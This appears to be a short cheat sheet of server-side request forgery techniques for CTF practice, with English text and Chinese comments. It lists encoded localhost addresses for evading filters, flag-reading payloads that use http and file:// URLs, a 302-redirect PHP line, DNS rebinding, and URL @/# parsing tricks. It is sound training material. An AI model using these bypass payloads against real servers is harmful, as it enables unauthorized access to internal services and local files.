1. Bypass localhost and 127.0.0.1
When the program restricts us from using localhost and 127.0.0.1, we can use hexadecimal conversion to bypass
http://0x7F.0.0.1 //16进制
http://0177.0.0.1 //8进制
http://2130706433 //10进制整数格式
http://0x7F000001 16进制整数格式
http://127.1 //省略模式
http://127.127.127.127 //用CIDR绕过localhost
http://0 //特殊地址0
http://0.0.0.0
http://[::1] //ipv6回环地址
IP hexadecimal conversion: https://tool.520101.com/wangluo/jinzhizhuanhuan
hexadecimal conversion: https://www.sojson.com/hexconvert.html
2.CTFSHOW example questions:
2.1 Directly exploit the SSRF vulnerability to read the flag locally:
Payload:url=http://127.0.0.1/ctf/ssrf/flag.php
Payload:url=file:///C:/phpstudy/phptutorial/www/ctf/ssrf/1.txt
2.2 Bypass localhost and 127.0.0.1
Payload:url=http://127.127.127.127/ctf/ssrf/flag.php
2.3 Bypass localhost and 0 and 1
(1) DNS rebinding:
http://test.com ——> 127.0.0.1
The public domain name resolves to 127.0.0.1:
https://blog.csdn.net/lovelyelfpop/article/details/107306577
(2) 302 jump:
header("Location:http://127.0.0.1/flag.php");
Payload:url=http://safe.taobao.com/ctf/ssrf/flag.php
2.4 Bypassing restricted URLs
The wonderful uses of # and @ in URLs:
例:https://www.baidu.com#www.qq.com
https://[email protected]
http://[email protected] //实则访问www.qq.com
http://www.baidu.com#www.qq.com //实则访问www.baidu.com
Payload:url=http://[email protected]/ctf/ssrf/flag.php#show